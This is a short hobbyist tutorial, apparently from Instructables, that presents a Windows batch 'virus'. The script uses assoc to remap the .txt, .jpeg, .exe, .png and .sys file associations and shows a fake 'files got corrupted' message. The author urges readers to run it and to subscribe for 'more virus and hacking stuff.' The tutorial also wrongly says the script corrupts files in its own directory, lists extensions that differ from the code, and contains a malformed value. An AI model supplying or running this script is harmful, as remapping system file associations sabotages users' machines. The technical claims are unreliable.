Introduction: Files Corrupting Virus Code

About: electronic engineer on the way up. :-)

Corrupting files on the computer

Step 1: Introduction

Sometimes we write or transfer something in our pendrive on any external disk and we see that the data got corrupted automatically this situation was very common five years ago and was caused by malicious programs. Now we will show you a program that has similar abilities and can corrupt data on the directory in which it resides please avoid running them in this program if you have some critical information or data. The effects of this program can be irreversible do not use any snippet of the code for unethical activities.

This instructables is just for spreading knowledge and awareness so let's get started .

Step 2: Code

Open Notepad and write the following code .

@echo off
assoc .txt=jpegfile

assoc .jpeg=avifile

assoc .exe=htmlfile

assoc .png=-mpegfile

assoc .sys=regfile

msg *files got currupted

exit

then save as " virus.bat " and move to some directory where files are useless and run this program. It corrupts the file with extension .jpg .PNG .mpeg .sys

subscribe to our channel for more virus and hacking stuff

like and share this INSTRUCTABLES with your friends take care bye